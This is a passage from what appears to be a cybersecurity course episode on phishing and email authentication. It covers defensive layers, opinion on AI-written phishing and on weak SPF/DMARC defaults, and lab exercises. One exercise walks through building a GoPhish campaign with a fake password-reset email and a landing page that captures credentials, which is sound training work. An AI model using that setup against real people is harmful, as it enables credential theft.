# - Configure Conditional Access (Azure AD) to restrict auth
# to managed devices and known locations
# - Enable real-time link scanning in email clients
# Layer 4: User Awareness (necessary but insufficient)
# - Regular phishing simulations (GoPhish, quarterly minimum)
# - Teach header inspection (check actual sender, not display name)
# - Establish and PRACTICE verification procedures for financial requests
# - Make it easy and consequence-free to report suspicious emails
# (a phishing report button that doesn't require effort)
# - Track metrics: click rates, report rates, time-to-report
The AI Slop Connection
AI is transforming phishing on both sides of the equation, and the attackers are winning.
On the offensive side, AI-generated phishing emails are grammatically perfect, contextually aware, and personalized at scale. The era of "check for spelling errors" as a phishing detection heuristic is completely over. An AI can scrape a target's LinkedIn profile, their recent public posts, their company's press releases, and generate a phishing email that references specific projects, uses the right internal terminology, and mimics the writing style of a colleague. The old "Nigerian prince" emails were easy to spot because they were poorly written. Modern AI phishing is indistinguishable from legitimate email because it IS well-written.
On the defensive side, AI is actively making email security configuration worse. AI assistants suggest SPF records with ~all instead of -all because "soft fail is safer during rollout." They generate DMARC records with p=none because "start with monitoring before enforcing." They never tell the user to schedule the migration to enforcement. The monitoring phase becomes permanent, and p=none provides exactly zero protection against spoofing.
The combination is devastating: better phishing emails hitting inboxes that are less protected because the email security was configured by an AI that optimized for "don't break anything" instead of "don't get breached."
The Bigger Picture
With episodes 35 through 39, we've now covered the full modern attack surface from infrastructure to the human: cloud platforms (35-36), containers (37), Infrastructure as Code (38), and now the initial access vector that leads to all of those -- email. The pattern is consistent across every layer: the protocols and systems were not designed with security as a primary requirement, security was bolted on later, and the bolt-on solutions only work when they're properly configured. SPF with ~all is like an IAM policy with "Action": "*" -- technically present but functionally useless.
The next episodes will move into DNS attacks and exploitation frameworks. DNS is the other foundational protocol (alongside email) that was designed without security in mind, and understanding how to manipulate DNS resolution opens up attack vectors that affect every layer of the stack we've covered so far. And exploitation frameworks like Metasploit systematize the manual techniques we've been demonstrating -- instead of crafting each exploit by hand, you'll use tooling that automates the process at scale.
Exercises
Exercise 1: Check the email authentication of 5 domains you interact with (your employer, your bank, major services). For each, look up: SPF record (dig TXT domain.com), DMARC record (dig TXT _dmarc.domain.com), and DMARC policy level (none/quarantine/reject). Document which domains are vulnerable to spoofing (no DMARC or p=none). Do NOT attempt to spoof -- just assess the configuration. Save your findings to ~/lab-notes/email-auth-assessment.md.
Exercise 2: Set up GoPhish on your lab machine. Create a phishing campaign targeting yourself: (a) set up a sending profile using a local SMTP server (Postfix or hMailServer), (b) create a convincing email template mimicking a password reset notification from a service you use, (c) create a landing page that captures submitted data. Send the campaign to your own email and verify the credential capture works. Document the full setup process and the GoPhish dashboard results in ~/lab-notes/gophish-simulation.md.
Exercise 3: Obtain the raw headers of a legitimate email and a spam/phishing email from your inbox. For each, trace the delivery path by reading the Received headers bottom-up. Document: (a) the originating IP address, (b) how many mail servers it passed through, (c) the SPF/DKIM/DMARC authentication results from the Authentication-Results header, (d) any red flags (mismatched From/Return-Path domains, unusual routing, failed authentication). Save your analysis to ~/lab-notes/email-header-forensics.md.